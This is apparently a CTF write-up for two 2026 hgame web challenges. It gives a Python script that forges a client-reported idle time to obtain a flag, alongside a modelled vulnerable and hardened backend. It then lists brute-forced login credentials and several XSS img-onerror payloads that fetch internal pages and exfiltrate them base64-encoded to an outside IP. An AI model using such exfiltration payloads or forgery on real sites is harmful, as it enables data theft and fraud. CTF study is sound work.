2026hgame


web

Marisa's Magic Catalog (魔理沙的魔法目录)

Analyze the JS with AI, and first get the username and token:

localStorage.getItem('ctf_user')
localStorage.getItem('ctf_token')

Then just write code that submits a time greater than 3600:

import requests

# Replace with the base URL and token you actually obtained
target = "http://cloud-big.hgame.vidar.club:31403"
token = "4578fe36-be89-46b2-8a5c-f61991e6f8ac" # obtained earlier from the console
username = "player_75506" # obtained earlier from the console

headers = {
    "Authorization": token,
    "Content-Type": "application/json"
}

# Tell the backend directly: I have already idled for 1000000 seconds
payload = {
    "username": username,
    "time": 1000000,
    "status": "success" # the status field is an optional field that appears in the code
}

# Submit the forged idle time in a single request
print("[*] 正在尝试瞬间刷时长...")
requests.post(f"{target}/record", json=payload, headers=headers)

# Request the flag
print("[*] 正在领取 Flag...")
r = requests.get(f"{target}/check", headers=headers)
# Print the result
print(f"[!] 结果: {r.text}")
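
The flaw this solution relies on, seen from the server side, as an added example that is not the challenge's own code: `VulnerableTracker` is an assumed model of a backend that trusts the client-supplied `time` field, while `HardenedTracker`, its `MAX_GAP` value and the sample username are hypothetical.

```python
import time

REQUIRED_SECONDS = 3600  # threshold taken from the write-up


class VulnerableTracker:
    """Assumed model of the flawed design: trusts the client's 'time' field."""

    def __init__(self):
        self.total = {}

    def record(self, user, payload):
        self.total[user] = self.total.get(user, 0) + payload["time"]

    def check(self, user):
        return self.total.get(user, 0) >= REQUIRED_SECONDS


class HardenedTracker:
    """Credits only time the server itself has seen elapse between heartbeats."""

    MAX_GAP = 30  # hypothetical: heartbeats further apart than this earn nothing

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.last_seen = {}
        self.total = {}

    def record(self, user, payload):
        # payload["time"] is deliberately ignored: it is attacker-controlled.
        now = self.clock()
        prev = self.last_seen.get(user)
        self.last_seen[user] = now
        if prev is not None and 0 < now - prev <= self.MAX_GAP:
            self.total[user] = self.total.get(user, 0.0) + (now - prev)

    def check(self, user):
        return self.total.get(user, 0.0) >= REQUIRED_SECONDS


def replay_forged_request(tracker):
    """Send one forged record (constructed sample) and report whether check passes."""
    forged = {"username": "player_constructed", "time": 1000000, "status": "success"}
    tracker.record(forged["username"], forged)
    return tracker.check(forged["username"])
```
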

Hakurei Shrine's Ema Rack (博丽神社的绘马挂)

A login box; just brute-force it:

adminstrator/root

<img src=x onerror="fetch('/archives.html').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/log?f='+btoa(encodeURIComponent(t)))">

<img src=x onerror="fetch('/api/archives').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/flag?f='+btoa(t))">

<img src=x onerror="fetch('/api/search?q=hgame').then(r=>r.text()).then(t=>new Image().src='http://101.200.39.193:5000/res?f='+btoa(t))">

<img src=x onerror="new Image().src='http://101.200.39.193:5000/ping';window.rd=d=>{new Image().src='http://101.200.39.193:5000/flag?f='+btoa(encodeURIComponent(JSON.stringify(d)))};var s=document.createElement('script');s.src='/api/search?q=&callback=rd';document.body.appendChild(s);">

<img src=x onerror="window.rd=d=>{var s=JSON.stringify(d);var b=btoa(unescape(encodeURIComponent(s)));new Image().src='http://101.200.39.193:5000/flag?f='+b};var s=document.createElement('script');s.src='/api/search?q=&callback=rd';document.body.appendChild(s);">

<script src="1">

Thanks for reading